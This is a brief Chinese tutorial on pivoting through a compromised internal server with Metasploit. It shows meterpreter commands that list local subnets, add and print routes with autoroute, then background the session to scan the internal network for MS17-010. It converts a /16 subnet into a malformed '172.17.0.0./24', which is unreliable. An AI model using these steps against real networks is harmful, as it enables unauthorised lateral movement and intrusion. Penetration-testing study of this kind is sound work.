如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。
MSF跳板实现过程:
需要获得一个msf的session会话;
获取内网地址网段;
在msf中添加”内网网段“的路由;
获取内网网段地址:
例如:meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0
由此可知,目标内网网段是“172.17.0.0./24”
添加去往目标网段的转发路由:
meterpreter > run autoroute -s 172.17.0.0/24
添加路由成功后,我们查看路由的添加情况:
meterpreter > run autoroute -p
至此,我们成功的把路由网段给添加到msf中。backgroup让会话在后台运行,我们可以用ms17-010来扫描整个内网机子了。